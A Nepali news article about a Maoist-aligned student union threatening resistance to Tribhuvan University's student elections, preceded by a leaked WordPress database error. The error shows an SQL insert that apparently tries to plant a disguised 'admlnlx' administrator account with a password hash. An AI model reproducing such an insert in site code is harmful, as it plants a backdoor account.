WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BMKA5k5yjDNFuzR1f.nIznVF5wfdtZ0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 08:32:08', '', 'admlnlx', 'admlnlx')
काठमाडौं, फागुन ३ –
विप्लव माओवादीको विद्यार्थी संठगन अखिल क्रान्तिकारीले आफूहरुको माग विपरित स्वतन्त्र विद्यार्थी युनियनको चुनाव नगराउन धम्की दिएको छ । त्रिवीले जबरजस्ती चुनाव गराउन खोजकै कारण सोमबार त्रिवीका शिक्षाध्यक्ष सुधा त्रिपाठीको गाडीमा आगजनी गरिएको भन्दै क्रान्तिकारीले जवरजस्ती चुनाव भएमा जे पनि हुन सक्ने चेतावनी दिएको छ ।
‘हामीलाई विश्वास छ, उहाँहरुले जवरजस्ती चुनाव गराउनुहुन्न भनेर, यदि जवरजस्ती भयो भने आन्दोलनको नियम अनुसार जसलाई जे पनि हुन सक्छ’ विप्लव निकट अखिल क्रान्तिकारीका महासचिव दिपेन्द्र चलाउनेले उज्यालो अनलाइनसँग भन्नुभयो, ‘आधा दर्जन विद्यार्थी संगठनलाई बाहिर राखेर चुनाव गराउँछु भन्ने कसैले कल्पना नगरे हुन्छ, त्यसो भयो भने प्रतिरोध हुनेछ ।’
आफ्नो माउ पार्टीको महाधिवेशन र स्ववियु चुनाव एकै समयमा परेकोले चुनाव सार्न माग गर्दै क्रान्तिकारीले देशभरीका धेरैजसो क्याम्पसमा तालाबन्दी गरेको छ । क्रान्तिकारीको तालावन्दीका कारण मंगलबार बेलुकीसम्म मतदाताको अन्तिम नामावली प्रकाशन गर्ने त्रिवीको निर्वाचन कार्यतालिका पूरा भएको छैन ।